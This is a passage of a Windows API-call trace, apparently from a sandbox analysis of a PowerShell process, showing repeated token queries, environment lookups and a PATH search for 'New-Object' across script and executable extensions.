lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x653ef8dd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0224.179] GetCurrentProcess () returned 0xffffffffffffffff [0224.179] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8e188 | out: TokenHandle=0x653ef8e188*=0x7c4) returned 1 [0224.181] GetCurrentProcess () returned 0xffffffffffffffff [0224.181] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8e188 | out: TokenHandle=0x653ef8e188*=0x7d8) returned 1 [0224.185] GetCurrentProcess () returned 0xffffffffffffffff [0224.185] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8df58 | out: TokenHandle=0x653ef8df58*=0x7dc) returned 1 [0224.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e000 | out: lpFileInformation=0x653ef8e000*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x653ef8d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0224.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dff8 | out: lpFileInformation=0x653ef8dff8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.189] GetCurrentProcess () returned 0xffffffffffffffff [0224.189] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8e188 | out: TokenHandle=0x653ef8e188*=0x7e0) returned 1 [0224.191] GetCurrentProcess () returned 0xffffffffffffffff [0224.191] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8e188 | out: TokenHandle=0x653ef8e188*=0x7e4) returned 1 [0224.215] GetCurrentProcess () returned 0xffffffffffffffff [0224.215] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8dee8 | out: TokenHandle=0x653ef8dee8*=0x7e8) returned 1 [0224.241] GetCurrentProcess () returned 0xffffffffffffffff [0224.241] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8def8 | out: TokenHandle=0x653ef8def8*=0x7ec) returned 1 [0224.255] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef8e0e0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0224.256] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x653ef8dee0, nSize=0x80 | out: lpBuffer="") returned 0x3a [0224.257] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x653ef8de90, nSize=0x80 | out: lpBuffer="") returned 0x3a [0224.258] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x653ef8df00, nSize=0x80 | out: lpBuffer="") returned 0x9d [0224.258] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x653ef8ded0, nSize=0x9d | out: lpBuffer="") returned 0x9c [0224.265] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d9f00 [0224.266] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x25b739d9f00 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x1f [0224.266] CoTaskMemFree (pv=0x25b739d9f00) [0224.277] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.279] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.280] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.ps1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.ps1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.287] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d8e00 [0224.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x25b739d8e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0224.287] CoTaskMemFree (pv=0x25b739d8e00) [0224.287] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.287] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.288] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.288] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.psm1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.psm1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.288] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.289] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.289] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.psd1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.psd1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.289] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.289] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.290] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.290] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.COM" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.com"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.290] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.290] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.290] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.291] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.EXE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.exe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.291] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.291] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.BAT" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.bat"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.292] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.292] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.CMD" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.cmd"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.293] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.293] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.VBS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.vbs"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.294] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.294] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.VBE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.vbe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.294] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common 